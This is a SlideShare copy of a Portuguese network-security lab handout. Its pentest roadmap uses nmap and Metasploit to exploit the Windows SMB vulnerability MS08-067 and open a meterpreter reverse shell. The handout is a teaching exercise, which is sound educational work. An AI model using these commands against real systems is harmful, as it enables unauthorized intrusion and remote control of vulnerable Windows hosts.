SlideShare a Scribd company logo
1 of 1
Download to read offline
Curso Superior de Tecnologia em Redes de Computadores
                         Segurança de Redes
                        Prof. Leandro Almeida

  1. Execute o nmap para verificar se o alvo é vulnerável (MS08-067) com o comando

     # nmap ­v –script=smb­check­vulns IP_DO_ALVO


  2. Em caso positivo, inicie o pentest com o Metasploit, utilizando o comando:

     # msfconsole



  3. Escolha o exploit que irá explorar a vulnerabilidade

     msf> use exploit/windows/smb/ms08_067_netapi



  4. Informe o IP do alvo

     msf exploit(ms08_067) > set RHOST IP_DO_ALVO



  5. Escolha o payload(carga do exploit)

    msf exploit(ms08_067) > set PAYLOAD  windows/meterpreter/reverse_tcp


  6. Informe o IP do atacante

     msf exploit(ms08_067) > set LHOST IP_DO_ATACANTE

  7. Execute o ataque

     msf exploit(ms08_067) > exploit 

More Related Content

Viewers also liked

Viewers also liked (7)

Manual instalação winxp
Manual instalação winxpManual instalação winxp
Manual instalação winxp
 
Unidade5 roteiro
Unidade5 roteiroUnidade5 roteiro
Unidade5 roteiro
 
Manual instalacao-cent os
Manual instalacao-cent osManual instalacao-cent os
Manual instalacao-cent os
 
Unidade3 roteiro proxy
Unidade3 roteiro proxyUnidade3 roteiro proxy
Unidade3 roteiro proxy
 
Unidade8 roteiro
Unidade8 roteiroUnidade8 roteiro
Unidade8 roteiro
 
Unidade7 roteiro
Unidade7 roteiroUnidade7 roteiro
Unidade7 roteiro
 
D do s
D do sD do s
D do s
 

More from Leandro Almeida (20)

Segurança de-redes
Segurança de-redesSegurança de-redes
Segurança de-redes
 
Unidade2 projeto lógico da rede
Unidade2   projeto lógico da redeUnidade2   projeto lógico da rede
Unidade2 projeto lógico da rede
 
Roteiro cups
Roteiro cupsRoteiro cups
Roteiro cups
 
Roteiro sambaswat
Roteiro sambaswatRoteiro sambaswat
Roteiro sambaswat
 
Roteiro samba
Roteiro sambaRoteiro samba
Roteiro samba
 
Roteiro vsftpd
Roteiro vsftpdRoteiro vsftpd
Roteiro vsftpd
 
Roteiro sshd
Roteiro sshdRoteiro sshd
Roteiro sshd
 
Roteiro nfs
Roteiro nfsRoteiro nfs
Roteiro nfs
 
Unidade5 roteiro footprint
Unidade5 roteiro footprintUnidade5 roteiro footprint
Unidade5 roteiro footprint
 
Unidade5 footprint
Unidade5 footprintUnidade5 footprint
Unidade5 footprint
 
Unidade 8 ieee802-11i
Unidade 8   ieee802-11iUnidade 8   ieee802-11i
Unidade 8 ieee802-11i
 
Unidade4 cripto
Unidade4 criptoUnidade4 cripto
Unidade4 cripto
 
Roteiro dns
Roteiro dnsRoteiro dns
Roteiro dns
 
Unidade 6 servico dns
Unidade 6   servico dnsUnidade 6   servico dns
Unidade 6 servico dns
 
Roteiro web
Roteiro webRoteiro web
Roteiro web
 
Unidade 7 cripto
Unidade 7  criptoUnidade 7  cripto
Unidade 7 cripto
 
Unidade 5 servico web
Unidade 5   servico webUnidade 5   servico web
Unidade 5 servico web
 
Unidade3 seg perimetral-vpn
Unidade3 seg perimetral-vpnUnidade3 seg perimetral-vpn
Unidade3 seg perimetral-vpn
 
Unidade3 seg perimetral-vpn
Unidade3 seg perimetral-vpnUnidade3 seg perimetral-vpn
Unidade3 seg perimetral-vpn
 
Unidade3 seg perimetral-ids
Unidade3 seg perimetral-idsUnidade3 seg perimetral-ids
Unidade3 seg perimetral-ids
 

Unidade6 roteiro pentest

  • 1. Curso Superior de Tecnologia em Redes de Computadores Segurança de Redes Prof. Leandro Almeida 1. Execute o nmap para verificar se o alvo é vulnerável (MS08-067) com o comando # nmap ­v –script=smb­check­vulns IP_DO_ALVO 2. Em caso positivo, inicie o pentest com o Metasploit, utilizando o comando: # msfconsole 3. Escolha o exploit que irá explorar a vulnerabilidade msf> use exploit/windows/smb/ms08_067_netapi 4. Informe o IP do alvo msf exploit(ms08_067) > set RHOST IP_DO_ALVO 5. Escolha o payload(carga do exploit)     msf exploit(ms08_067) > set PAYLOAD  windows/meterpreter/reverse_tcp 6. Informe o IP do atacante msf exploit(ms08_067) > set LHOST IP_DO_ATACANTE 7. Execute o ataque msf exploit(ms08_067) > exploit